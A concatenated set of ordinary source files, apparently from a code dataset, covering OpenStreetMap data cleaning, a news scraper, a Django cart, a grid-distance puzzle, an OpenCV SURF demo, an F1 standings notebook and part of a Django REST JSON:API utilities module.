re.compile(r'[=\\+/&<>;\\'\"\\?%#$@\\,\\.{}\\t\\r\\n]')\nCITY_NAMES = [\"Minneapolis\", \"Saint Paul\", \"Minneapolis, MN\", \"St. 
Paul\"]\nCREATED = [\"version\", \"changeset\", \"timestamp\", \"user\", \"uid\"]\nPOSTCODES = [\"55401\", \"55402\", \"55403\", \"55404\", \"55405\", \"55406\", \"55407\",\n             \"55408\", \"55409\"]\nPOSTCODES += [\"554\" + str(x) for x in range(10, 89)]\nSTREET_TYPES = {\"ave\": \"Avenue\", \"av\": \"Avenue\", \"blvd\": \"Boulevard\",\n                \"boulivard\": \"Boulevard\", \"ct\": \"Court\", \"dr\": \"Drive\",\n                \"e\": \"East\", \"ln\": \"Lane\", \"n\": \"North\", \"ne\": \"Northeast\",\n                \"nw\": \"Northwest\", \"northwest`\": \"Northwest\", \"pkwy\": \"Parkway\",\n                \"pl\": \"Plaza\", \"rd\": \"Road\", \"s\": \"South\", \"se\": \"Southeast\",\n                \"sw\": \"Southwest\", \"street\": \"Street\", \"st\": \"Street\",\n                \"trl\": \"Trail\", \"ter\": \"Terrace\", \"terr\": \"Terrace\",\n                \"w\": \"West\"}\n\n\ndef in_city_limits(lat, lon):\n    \"\"\"Determines if a node is within the Minneapolis city boundaries.\n\n    Args:\n        lat (float): The latitude of the point.\n        lon (float): The longitude of the point.\n\n    Returns:\n        bool: True if latitude and longitude are within the city boundaries\n            and False otherwise.\n    \"\"\"\n    if lat <= 45.05125 and lat >= 44.889787:\n        if lon <= -93.193794 and lon >= -93.329437:\n            return True\n\n    return False\n\ndef clean_street_field(value):\n    \"\"\"Makes sure the street name is formatted correctly.\n\n    Args:\n        value (str): The original street name.\n\n    Returns:\n        str: Same string or updated string depending on how it was originally\n            formatted.\n    \"\"\"\n\n    street = value.split(' ')\n    value = ''\n\n    for word in street:\n        # Space between words\n        if len(value) != 0:\n            value += ' '\n\n        temp_word = word.lower()\n        # drop periods so abbreviations like \"Ave.\" match the lookup table\n        temp_word = temp_word.replace('.', '')\n\n        if temp_word in STREET_TYPES.keys():\n            value += STREET_TYPES[temp_word]\n        else:\n            value += word\n\n    return value\n\ndef clean_k_value(value):\n    \"\"\"Cleans string.\n\n    Cleans the value of a k-tag fixing: misspelling, unnecessary capitalization.\n    Also, if the value contains any problem characters or a ':', then the\n    information was most likely entered incorrectly or in a manner that is\n    inconsistent with OSM standards and is therefore ignored.\n\n    Args:\n        value (str): Value from a k-tag of an element in the osm data.\n\n    Returns:\n        str: Cleaned string.\n        None: Value contains problem characters.\n    \"\"\"\n    if PROBLEMCHARS.search(value) != None or ':' in value:\n        return None\n\n    if value == 'CHURCH':\n        return 'place_of_worship'\n    elif value == 'parking_enterance':\n        return 'parking_entrance'\n\n    return value\n\ndef clean_subfield_tags(key, value):\n    \"\"\"Cleans and structures the subfields of a k-tag.\n\n    Args:\n        key (str): The key string of the subfield.\n        value (str): The value associated with the key.\n\n    Returns:\n        (int, str, str): Number to specify whether or not to keep the data\n            element, the key in the dictionary, and the value for that key.\n    \"\"\"\n    if key.startswith('addr:'):\n        # Deals with inconsistent state entered\n        if key == 'addr:state':\n            if 'w' not in str.lower(value):\n                return (0, 'state', 'MN')\n\n        elif key == 'addr:postcode':\n            if len(value) >= 5:\n                # ZIP+4 codes (\"55401-1234\") contribute only their five-digit prefix\n                if len(value) == 10 and value[:5] in POSTCODES:\n                    return (0, 'postcode', value[:5])\n                elif len(value) == 5 and value.isdigit() and value in POSTCODES:\n                    return (0, 'postcode', value)\n\n        elif key == 'addr:street':\n            return (0, 'street', clean_street_field(value))\n\n        elif key == 'addr:city':\n            if value in CITY_NAMES:\n                if 'MN' in value:\n                    return (0, 'city', CITY_NAMES[0])\n                elif value == 'St. 
Paul':\n                    return (0, 'city', CITY_NAMES[1])\n                else:\n                    return (0, 'city', value)\n\n        elif ':' not in key[5:]:\n            return (0, key[5:], value)\n\n    return (-1, None, None)\n\ndef shape_k_tag(element, node):\n    \"\"\"Cleans the k-tags of an element.\n\n    Adds fields and subfields to a dictionary corresponding to specific\n    information. (e.g. address information and amenity information)\n\n    Args:\n        element: The XML element being cleaned.\n        node (dict): The dictionary containing the new structured and cleaned\n            information from element.\n\n    Returns:\n        dict: An updated node dictionary.\n        None: Inconsistent data in the k-tags that indicated the node wasn't\n            actually in Minneapolis.\n    \"\"\"\n    # Lists to hold specific special fields\n    address_list = []\n    node_refs = []\n\n\n    # Iterate through tags and nds of an element\n    for child in element:\n        if child.tag == 'tag':\n            if PROBLEMCHARS.search(child.attrib['k']) is None:\n                # Subfield information\n                if \":\" in child.attrib[\"k\"]:\n                    (spec, key, value) = clean_subfield_tags(child.attrib['k'],\n                                                             child.attrib['v'])\n                    if spec == -1:\n                        return None\n                    else:\n                        address_list.append((key, value))\n\n                # All other k tags\n                else:\n                    value = clean_k_value(child.attrib['v'])\n\n                    if value:\n                        node[child.attrib['k']] = value\n\n        elif child.tag == 'nd':\n            node_refs.append(child.attrib['ref'])\n    if address_list:\n        node['address'] = dict(address_list)\n    if node_refs:\n        node['node_refs'] = node_refs\n\n    return node\n\ndef shape_element(element):\n    \"\"\"Cleans an individual element in an XML tree.\"\"\"\n    node = {}\n\n    if element.tag == \"node\" or element.tag == \"way\":\n        # Latitude and longitude of point\n        lat = lon = None\n        try:\n            lat = float(element.attrib[\"lat\"])\n            lon = float(element.attrib[\"lon\"])\n\n            # GEO 2D data\n            node[\"pos\"] = [lat, lon]\n        except KeyError:\n            pass\n        except ValueError:\n            pass\n\n        # Lat is positive and lon is neg, so if they exist they won't be equal\n        if (lat != lon and in_city_limits(lat, lon)) or lat == lon:\n            # Type of node\n            node['type'] = element.tag\n\n            # Attributes of element\n            created_tuples = []\n            for key, value in element.attrib.items():\n                if key in ['lat', 'lon']:\n                    continue  # Pos data already added\n                elif key in CREATED:\n                    created_tuples.append((key, value))\n                else:\n                    node[key] = value\n\n            # Created dict\n            node[\"created\"] = dict(created_tuples)\n\n            # Shape and store children tags\n            node = shape_k_tag(element, node)\n\n            return node\n\n    return None\n\ndef process_map(file_in, collection):\n    \"\"\"Cleans map data and stores it to a file.\n\n    Receives a .osm file and goes node-by-node, cleaning each element and\n    possibly adding it to the clean .json file with the same name as the .osm\n    file. Also, adds the element into the collection.\n\n    Args:\n        file_in (str): Name of the file containing the data to be cleaned.\n        collection (MongoCollection): Collection that the cleaned files will\n            be stored in.\n    \"\"\"\n    file_out = \"{0}.json\".format(file_in[:-4])\n    data = []\n\n    # Store JSON output\n    with codecs.open(file_out, \"w\") as writer:\n        for _, element in ET.iterparse(file_in):\n            # Clean element\n            element = shape_element(element)\n            if element:\n                data.append(element)\n                writer.write(json.dumps(element) + \"\\n\")\n\n    collection.insert_many(data)\n","repo_name":"GraysonRicketts/OSM-Data-Wrangling","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":8947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
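# --- Illustrative usage sketch for process_map() from the OSM module above;
# the file, database and collection names are hypothetical.
from pymongo import MongoClient

collection = MongoClient("localhost", 27017).osm.minneapolis
process_map("minneapolis.osm", collection)
print(collection.count_documents({"type": "node"}))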
Also, adds the element into the collection.\n\n Args:\n file_in (str): Name of the file containing the data to be cleaned.\n collection (MongoCollection): Collection that the cleaned files will\n be stored in.\n \"\"\"\n file_out = \"{0}.json\".format(file_in[:-4])\n data = []\n\n # Store JSON output\n with codecs.open(file_out, \"w\") as writer:\n for _, element in ET.iterparse(file_in):\n # Clean element\n element = shape_element(element)\n if element:\n data.append(element)\n writer.write(json.dumps(element) + \"\\n\")\n\n collection.insert_many(data)\n","repo_name":"GraysonRicketts/OSM-Data-Wrangling","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":8947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"75030656426","text":"import datasets\n\n#async packages\nfrom aiohttp import ClientSession\nimport asyncio\n# basic python packages\nimport requests\nimport re\nimport subprocess\n# dataframes\nimport pandas as pd\n# file systems\nfrom glob import glob\nimport os\nimport sys\nfrom bs4 import BeautifulSoup\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm\nfrom tempfile import NamedTemporaryFile\nimport csv\n\n\nsummary_df = pd.read_csv('text_summary_stats.csv')\n\n\n\ndef gen_temp_file():\n if len(glob('text_datasets/*.csv')):\n pass\n else:\n # subprocess was used here but never imported; fall back to python3\n # only when the 'python' executable is missing\n try:\n subprocess.run(['python','data_prep.py'])\n except FileNotFoundError:\n subprocess.run(['python3','data_prep.py'])\n\n csv_files = glob('text_datasets/*.csv')\n \n \n if os.path.exists(os.path.join(os.getcwd(), 'online_news_popularity_data')):\n pass\n else:\n os.mkdir(os.path.join(os.getcwd(), 'online_news_popularity_data'))\n \n \n fpath = os.path.join(os.getcwd(), 'online_news_popularity_data', 'online_news_popularity_data.csv')\n# with NamedTemporaryFile(mode='w', suffix = '.csv', \n# dir = os.path.join(os.getcwd(), 'online_news_popularity_data'), \n# delete=False) as f:\n\n\n with open(fpath, 'w') as f:\n fieldnames = pd.read_csv(csv_files[0]).columns.tolist()\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n writer.writeheader()\n\n for csv_file in tqdm(csv_files):\n with open(csv_file) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n row_dict = {fieldname: row[fieldname] for fieldname in fieldnames}\n writer.writerow(row_dict)\n# writer.writerow({'title': row['title'],\n# 'content': row['content'],\n# 'shares': row['shares']})\n return fpath\n\n\n\n\n\n\n\n\ndef get_texts(urls, shares):\n df = asyncio.run(download_all_data(urls, shares))\n return df\n\n\nasync def text_download(url, session):\n async with session.get(url) as resp:\n if resp.status == 200:\n try:\n html = await resp.read()\n soup = BeautifulSoup(html, 'html.parser')\n title = soup.find('title').text.split(' | ')[0]\n paragraphs = soup.find_all('p')\n texts = [p.text for p in paragraphs if 'nggallery' not in p.text]\n text = '\\n'.join(texts)\n except Exception:\n title, text = None, None\n return title, text\n else:\n return None, None\n \n\nasync def download_all_data(urls, shares):\n async with ClientSession() as session:\n tasks = [text_download(url, session) for url in urls]\n full_texts = await asyncio.gather(*tasks)\n titles = [text[0] for text in full_texts]\n contents = [text[1] for text in full_texts]\n df = pd.DataFrame(zip(titles, contents, shares), columns = ['title','content','shares'])\n return df\n\ndef save_text_csv(urls, shares, file_name, summary):\n try:\n dataset_dir = os.path.join(os.getcwd(), 'text_datasets')\n if os.path.exists(dataset_dir):\n pass\n else:\n 
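One practical caveat with the scraper above (a sketch, not in the original data_prep.py): asyncio.gather fires every request at once, so tens of thousands of URLs would open that many sockets. A semaphore caps concurrency while keeping the same interface; text_download and pd come from the file above.

import asyncio
from aiohttp import ClientSession

async def download_all_data_throttled(urls, shares, limit=20):
    sem = asyncio.Semaphore(limit)

    async def guarded(url, session):
        async with sem:  # at most `limit` requests in flight
            return await text_download(url, session)

    async with ClientSession() as session:
        full_texts = await asyncio.gather(*(guarded(u, session) for u in urls))
    titles = [t[0] for t in full_texts]
    contents = [t[1] for t in full_texts]
    return pd.DataFrame(zip(titles, contents, shares),
                        columns=['title', 'content', 'shares'])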
os.mkdir(dataset_dir)\n\n df = asyncio.run(download_all_data(urls, shares))\n df = pd.concat([df.reset_index(drop = True), summary.reset_index(drop = True)], axis = 1)\n df.to_csv(os.path.join(dataset_dir, file_name), index = False)\n except Exception:\n pass\n return None\n\n\n\n\n\n\nif __name__ == '__main__':\n \n dl_manager = datasets.DownloadManager()\n _DOWNLOAD_URL = 'https://archive.ics.uci.edu/ml/machine-learning-databases/00332/OnlineNewsPopularity.zip'\n archive = dl_manager.download(_DOWNLOAD_URL)\n\n for path, f in dl_manager.iter_archive(archive):\n if path[-3:] == 'csv':\n df = pd.read_csv(f)\n\n df.columns = df.columns.str.strip()\n urls = df.url.str.replace('http://', 'https://')\n shares = df.shares\n N = df.shape[0]\n batch_size = 100\n print('start process')\n # note: pandas .loc slicing is end-inclusive, hence the -1 so each batch has exactly batch_size rows\n res = Parallel(n_jobs = -1)(delayed(save_text_csv)(urls[i*batch_size:(i+1)*batch_size], shares[i*batch_size:(i+1)*batch_size], f\"dataset_{i}.csv\", summary_df.loc[i*batch_size:(i+1)*batch_size-1,:]) for i in tqdm(range(N//batch_size+1)))\n \n path = gen_temp_file()\n df = pd.read_csv(path)\n df = df.loc[df.notnull().prod(axis = 1).astype(bool),:].reset_index(drop = True)\n df.to_csv(path, index = False)\n\n# text_df = get_texts(urls[:1000], shares[:1000])\n# save_text_csv(urls[:100], shares[:100], 'text_data.csv')\n# text_df.to_csv('text_data.csv', index = False)\n\n# res = Parallel(n_jobs=-1)(delayed(fun)() for fun in self.functions.values())","repo_name":"leeparkuky/UKYDataScienceComp2023","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"11062281660","text":"import os, re, sys\n\ntry:\n\tfrom lxml import etree\nexcept ImportError:\n\tprint(\"python-lxml module not found! (python-lxml)\")\n\tprint(\"see http://codespeak.net/lxml/\")\n\tprint(\"program terminating ...!\")\n\tsys.exit(-1)\n\n\n##################################################\n# constants:\n# namespace-constant for src2srcml\n__cppnscpp = 'http://www.srcML.org/srcML/cpp'\n__cppnsdef = 'http://www.srcML.org/srcML/src'\n__cpprens = re.compile('{(.+)}(.+)')\n\n__conditionals = ['if', 'ifdef', 'ifndef']\n__conditionals_endif = ['endif']\n##################################################\n\ndef _getIfdefEndifRatio(root):\n\t\"\"\"This function determines all conditionals and their corresponding\n\tendifs and returns a counter for each of them.\"\"\"\n\tifdef = 0\n\tendif = 0\n\n\t# get all nodes\n\tallnodes = [node for node in root.iterdescendants()]\n\n\tfor node in allnodes:\n\t\tns, tag = __cpprens.match(node.tag).groups()\n\n\t\tif ((tag in __conditionals) \\\n\t\t\t\tand (ns == __cppnscpp)):\n\t\t\tifdef += 1\n\t\tif ((tag in __conditionals_endif) \\\n\t\t\t\tand (ns == __cppnscpp)):\n\t\t\tendif += 1\n\n\treturn (ifdef, endif)\n\n\ndef apply(folder):\n\t\"\"\"This function applies the determination function (_getIfdefEndifRatio)\n\tto each file and prints out the difference in case there is one.\"\"\"\n\tfolder = os.path.abspath(folder)\n\tfiles = os.listdir(folder)\n\tfiles = filter(lambda n: os.path.splitext(n)[1] == \".xml\", files)\n\n\tfor file in files:\n\n\t\ttry:\n\t\t\ttree = etree.parse(os.path.join(folder, file))\n\t\texcept etree.XMLSyntaxError:\n\t\t\tprint(\"ERROR: cannot parse (%s). 
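Aside (not in the original data_prep.py): the row filter at the end of the __main__ block keeps only rows with no nulls; pandas' dropna expresses the same thing directly.

df = pd.read_csv(path)
df = df.dropna().reset_index(drop=True)  # equivalent to the notnull().prod() mask
df.to_csv(path, index=False)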
Skipping this file!\" % file)\n\t\t\tcontinue  # tree is unset on failure; move to the next file\n\n\t\troot = tree.getroot()\n\t\tifdef, endif = _getIfdefEndifRatio(root)\n\n\t\tif (ifdef != endif):\n\t\t\tprint(\"INFO: (%30s) ifdef : endif is %5s : %5s\" % (file, str(ifdef), str(endif)))\n\n\ndef usage():\n\t\"\"\"This function prints usage information to stdout.\"\"\"\n\tprint('usage:')\n\tprint(' ' + sys.argv[0] + ' <folder>')\n\n\n##################################################\nif __name__ == '__main__':\n\n\tif (len(sys.argv) < 2):\n\t\tusage()\n\t\tsys.exit(-1)\n\n\tfolder = sys.argv[1]\n\tif (os.path.isdir(folder)):\n\t\tapply(folder)\n\telse:\n\t\tusage()\n\t\tsys.exit(-1)\n","repo_name":"Florian-Striebel/RIMEL-F","sub_path":"scripts/ifdefendifratio.py","file_name":"ifdefendifratio.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"17987982558","text":"class Items(object):\n def __init__(self, request):\n if request.session.get('items', False):\n self.items = request.session['items']\n else:\n self.items = []\n self.alert = 'success'\n\n def add_item(self, request, item_id):\n try:\n item = {'id': item_id, 'count': 1}\n self.items.append(item)\n request.session['items'] = self.items\n except Exception:\n self.alert = 'error'\n return self.alert\n\n def delete_item(self, request, item_position):\n try:\n self.items.pop(item_position-1)\n request.session['items'] = self.items\n except Exception:\n self.alert = 'error'\n return self.alert\n\n def change_count(self, request, item_position, count):\n try:\n item = self.items[item_position-1]\n if count > 0:\n item['count'] = count\n else:\n item['count'] = 1\n self.items[item_position-1] = item\n request.session['items'] = self.items\n except Exception:\n self.alert = 'error'\n return self.alert\n\n","repo_name":"arskhal/shop","sub_path":"cart/cart_items.py","file_name":"cart_items.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"73403454186","text":"from itertools import combinations \nimport numpy as np\n\nn, m = map(int, input().split())\ngraph = [list(map(int, input().split())) for _ in range(n)]\nprint(np.array(graph))\n\nhouses = []\nchickes = []\nresult = int(1e9) # start high so min() below can shrink it; initializing to 0 made every answer 0\nfor i in range(n):\n for j in range(n):\n if graph[i][j] == 1:\n houses.append((i,j))\n elif graph[i][j] == 2:\n chickes.append((i,j))\n\n# \nchickin_combos = list(combinations(chickes, m)) # -> e.g. when m=2: ((4,2), (4,3)), ...\n\n# each combo holds m coordinates, e.g. (4,2), (2,3), ... m in total\n\"\"\" \n1. First pick a combination of m chicken places.\n2. For a given combination...\n3. Loop over the houses.\n4. 
In this loop, compute the distance between one house and each chicken place in the combination.\n\"\"\"\nfor combo in chickin_combos:\n temp_dist = 0\n for house in houses:\n chickin_lengths = []\n for i in combo:\n chickin_lengths.append((abs(house[0]-i[0]) + abs(house[1]-i[1]))) \n temp_dist += min(chickin_lengths)\n \n result = min(result, temp_dist)\n\nprint(result)\n\n \n \n","repo_name":"cylanokim/Data_Analysis","sub_path":"python_Adv/치킨 거리 dfs.py","file_name":"치킨 거리 dfs.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"4206703521","text":"from __future__ import annotations\nfrom ..entities.data_source import DataSource\nfrom typing import List\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nfrom uuid import uuid4\n\n\nclass WebSite(DataSource):\n def __init__(self, url: str):\n self._url = url\n self._content = None\n\n def get_name(self, prefix: str = '') -> str:\n return prefix + str(datetime.now().strftime(\"%H-%M-%S\")) + '_' + str(uuid4()) + '.html'\n\n def get_content(self):\n print(f'Getting content from {self._url}...')\n response = requests.get(self._url)\n self._content = response.text\n return self._content\n\n def get_links(self) -> List['WebSite']:\n links = []\n if self._content:\n soup = BeautifulSoup(self._content, 'html.parser')\n for link in soup.find_all('a'):\n links.append(WebSite(link.get('href')))\n return links\n","repo_name":"vukolov/crawler","sub_path":"webcrawler/external/web_site.py","file_name":"web_site.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"8002242479","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport numpy\nfrom pylab import *\n\n\n# read in the image\nim = cv2.imread('../data/empire.jpg')\n# downsample\nim_lowres = cv2.pyrDown(im)\n# convert to a grayscale image\ngray = cv2.cvtColor(im_lowres, cv2.COLOR_RGB2GRAY)\n# detect interest points\ns = cv2.SURF()\nmask = numpy.uint8(ones(gray.shape))\nkeypoints = s.detect(gray, mask)\n# show the image and the interest points\nvis = cv2.cvtColor(gray, cv2.COLOR_GRAY2BGR)\nfor k in keypoints[::10]:\n cv2.circle(vis, (int(k.pt[0]), int(k.pt[1])), 2, (0, 255, 0), -1)\n cv2.circle(vis, (int(k.pt[0]), int(k.pt[1])), int(k.size), (0, 255, 0), 2)\ncv2.imshow('local descriptors', vis)\ncv2.waitKey()\n\ncv2.imwrite('../images/ch10/ch10_P261_Fig10-3.jpg',vis)","repo_name":"willard-yuan/pcv-book-code","sub_path":"ch10/ch10_P261_Fig10-3.py","file_name":"ch10_P261_Fig10-3.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":492,"dataset":"github-code","pt":"37"}
{"seq_id":"2453496017","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC ### Driver Standings Transformation from F1 Driver Standings Page\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_file_date\", \"2021-03-21\")\nv_file_date = dbutils.widgets.get(\"p_file_date\")\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/configuration\"\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/common_functions\"\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 1 - Find race_year values for which the data is to be reprocessed\n\n# COMMAND ----------\n\nrace_results_df = spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\") \\\n.filter(f\"file_date = '{v_file_date}'\")\n\n# COMMAND ----------\n\nrace_year_list = column_to_list(race_results_df, \"race_year\")\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import col\n\nrace_results_df = 
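The triple loop above recomputes every house-to-restaurant Manhattan distance for each combination. A sketch (illustrative only, reusing the same houses/chickes/m names) that precomputes the distance matrix once:

# dist[h][c] = Manhattan distance from house h to chicken place c
dist = [[abs(hx - cx) + abs(hy - cy) for (cx, cy) in chickes]
        for (hx, hy) in houses]

best = int(1e9)
for combo in combinations(range(len(chickes)), m):
    total = sum(min(dist[h][c] for c in combo) for h in range(len(houses)))
    best = min(best, total)
print(best)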
spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\") \\\n.filter(col(\"race_year\").isin(race_year_list))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 2 - Aggregation by sum of points\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import sum, when, count\n\ndriver_standings_df = race_results_df \\\n.groupBy(\"race_year\", \"driver_name\", \"driver_nationality\") \\\n.agg(sum(\"points\"), count(when(col(\"position\") == 1, True))) \\\n.withColumnRenamed(\"sum(points)\", \"total_points\") \\\n.withColumnRenamed(\"count(CASE WHEN (position = 1) THEN true END)\", \"wins\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 3 - Creating a window function for the rank column\n\n# COMMAND ----------\n\nfrom pyspark.sql.window import Window\nfrom pyspark.sql.functions import desc, rank\n\ndriver_rank_spec = Window.partitionBy(\"race_year\").orderBy(desc(\"total_points\"), desc(\"wins\"))\nfinal_df = driver_standings_df.withColumn(\"rank\", rank().over(driver_rank_spec))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 4 - Write data to datalake as Delta\n\n# COMMAND ----------\n\n# overwrite_partition(final_df, \"formula_one_presentation\", \"driver_standings\", \"race_year\")\n\n# COMMAND ----------\n\nmerge_condition = \"tgt.race_year = src.race_year AND tgt.driver_name = src.driver_name\"\nmerge_delta_data(final_df, \"formula_one_presentation\", \"driver_standings\", presentation_folder_path, merge_condition, \"race_year\")\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC SELECT * FROM formula_one_presentation.driver_standings;\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC SELECT race_year, COUNT(1)\n# MAGIC FROM formula_one_presentation.driver_standings\n# MAGIC GROUP BY race_year\n# MAGIC ORDER BY race_year DESC;\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC SELECT *\n# MAGIC FROM formula_one_presentation.driver_standings\n# MAGIC WHERE race_year = 2021;\n\n# COMMAND ----------\n\n\n","repo_name":"dylankjones256/udemy_spark_core_course","sub_path":"driver_standings.py","file_name":"driver_standings.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6261013635","text":"import inspect\nimport operator\n\nimport inflection\nfrom django.conf import settings\nfrom django.db.models import Manager\nfrom django.db.models.fields.related_descriptors import (\n ManyToManyDescriptor,\n ReverseManyToOneDescriptor,\n)\nfrom django.http import Http404\nfrom django.utils import encoding\nfrom django.utils.translation import gettext_lazy as _\nfrom rest_framework import exceptions, relations\nfrom rest_framework.exceptions import APIException\nfrom rest_framework.settings import api_settings\n\nfrom .settings import json_api_settings\n\n# Generic relation descriptor from django.contrib.contenttypes.\nif \"django.contrib.contenttypes\" not in settings.INSTALLED_APPS: # pragma: no cover\n # Target application does not use contenttypes. 
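The wins column in the notebook above leans on a Spark detail worth spelling out: when(cond, True) without .otherwise() yields NULL for non-matching rows, and count() skips NULLs, so count(when(position == 1, True)) counts only race wins. A tiny illustration (assumes the notebook's spark session):

from pyspark.sql import functions as F

demo = spark.createDataFrame([(1,), (2,), (1,)], ["position"])
demo.select(
    F.count(F.when(F.col("position") == 1, True)).alias("wins")  # -> 2
).show()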
Importing would cause errors.\n ReverseGenericManyToOneDescriptor = object()\nelse:\n from django.contrib.contenttypes.fields import ReverseGenericManyToOneDescriptor\n\n\ndef get_resource_name(context, expand_polymorphic_types=False):\n \"\"\"\n Return the name of a resource.\n \"\"\"\n from rest_framework_json_api.serializers import PolymorphicModelSerializer\n\n view = context.get(\"view\")\n\n # Sanity check to make sure we have a view.\n if not view:\n return None\n\n # Check to see if there is a status code and return early\n # with the resource_name value of `errors`.\n try:\n code = str(view.response.status_code)\n except (AttributeError, ValueError):\n pass\n else:\n if code.startswith(\"4\") or code.startswith(\"5\"):\n return \"errors\"\n\n try:\n resource_name = view.resource_name\n except AttributeError:\n try:\n if \"kwargs\" in context and \"related_field\" in context[\"kwargs\"]:\n serializer = view.get_related_serializer_class()\n else:\n serializer = view.get_serializer_class()\n if expand_polymorphic_types and issubclass(\n serializer, PolymorphicModelSerializer\n ):\n return serializer.get_polymorphic_types()\n else:\n return get_resource_type_from_serializer(serializer)\n except AttributeError:\n try:\n resource_name = get_resource_type_from_model(view.model)\n except AttributeError:\n resource_name = view.__class__.__name__\n\n if not isinstance(resource_name, str):\n # The resource name is not a string - return as is\n return resource_name\n\n # the name was calculated automatically from the view > pluralize and format\n resource_name = format_resource_type(resource_name)\n\n return resource_name\n\n\ndef get_serializer_fields(serializer):\n fields = None\n if hasattr(serializer, \"child\"):\n fields = serializer.child.fields\n meta = getattr(serializer.child, \"Meta\", None)\n if hasattr(serializer, \"fields\"):\n fields = serializer.fields\n meta = getattr(serializer, \"Meta\", None)\n\n if fields is not None:\n meta_fields = getattr(meta, \"meta_fields\", {})\n for field in meta_fields:\n try:\n fields.pop(field)\n except KeyError:\n pass\n return fields\n\n\ndef format_field_names(obj, format_type=None):\n \"\"\"\n Takes a dict and returns it with formatted keys as set in `format_type`\n or `JSON_API_FORMAT_FIELD_NAMES`\n\n :format_type: Either 'dasherize', 'camelize', 'capitalize' or 'underscore'\n \"\"\"\n if format_type is None:\n format_type = json_api_settings.FORMAT_FIELD_NAMES\n\n if isinstance(obj, dict):\n return {format_value(key, format_type): value for key, value in obj.items()}\n\n return obj\n\n\ndef undo_format_field_names(obj):\n \"\"\"\n Takes a dict and undo format field names to underscore which is the Python convention\n but only in case `JSON_API_FORMAT_FIELD_NAMES` is actually configured.\n \"\"\"\n if json_api_settings.FORMAT_FIELD_NAMES:\n return format_field_names(obj, \"underscore\")\n\n return obj\n\n\ndef format_field_name(field_name):\n \"\"\"\n Takes a field name and returns it with formatted keys as set in\n `JSON_API_FORMAT_FIELD_NAMES`\n \"\"\"\n return format_value(field_name, json_api_settings.FORMAT_FIELD_NAMES)\n\n\ndef undo_format_field_name(field_name):\n \"\"\"\n Takes a string and undos format field name to underscore which is the Python convention\n but only in case `JSON_API_FORMAT_FIELD_NAMES` is actually configured.\n \"\"\"\n if json_api_settings.FORMAT_FIELD_NAMES:\n return format_value(field_name, \"underscore\")\n\n return field_name\n\n\ndef format_link_segment(value):\n \"\"\"\n Takes a string value and returns 
it with formatted keys as set in `format_type`\n or `JSON_API_FORMAT_RELATED_LINKS`.\n\n :format_type: Either 'dasherize', 'camelize', 'capitalize' or 'underscore'\n \"\"\"\n format_type = json_api_settings.FORMAT_RELATED_LINKS\n return format_value(value, format_type)\n\n\ndef undo_format_link_segment(value):\n \"\"\"\n Takes a link segment and undos format link segment to underscore which is the Python\n convention but only in case `JSON_API_FORMAT_RELATED_LINKS` is actually configured.\n \"\"\"\n\n if json_api_settings.FORMAT_RELATED_LINKS:\n return format_value(value, \"underscore\")\n\n return value\n\n\ndef format_value(value, format_type):\n if format_type == \"dasherize\":\n # inflection can't dasherize camelCase\n value = inflection.underscore(value)\n value = inflection.dasherize(value)\n elif format_type == \"camelize\":\n value = inflection.camelize(value, False)\n elif format_type == \"capitalize\":\n value = inflection.camelize(value)\n elif format_type == \"underscore\":\n value = inflection.underscore(value)\n return value\n\n\ndef format_resource_type(value, format_type=None, pluralize=None):\n if format_type is None:\n format_type = json_api_settings.FORMAT_TYPES\n\n if pluralize is None:\n pluralize = json_api_settings.PLURALIZE_TYPES\n\n if format_type:\n value = format_value(value, format_type)\n\n return inflection.pluralize(value) if pluralize else value\n\n\ndef get_related_resource_type(relation):\n from rest_framework_json_api.serializers import PolymorphicModelSerializer\n\n try:\n return get_resource_type_from_serializer(relation)\n except AttributeError:\n pass\n relation_model = None\n if hasattr(relation, \"_meta\"):\n relation_model = relation._meta.model\n elif hasattr(relation, \"model\"):\n # the model type was explicitly passed as a kwarg to ResourceRelatedField\n relation_model = relation.model\n elif hasattr(relation, \"get_queryset\") and relation.get_queryset() is not None:\n relation_model = relation.get_queryset().model\n elif hasattr(relation, \"child_relation\"):\n # For ManyRelatedField relationships, get the model from the child relationship\n try:\n return 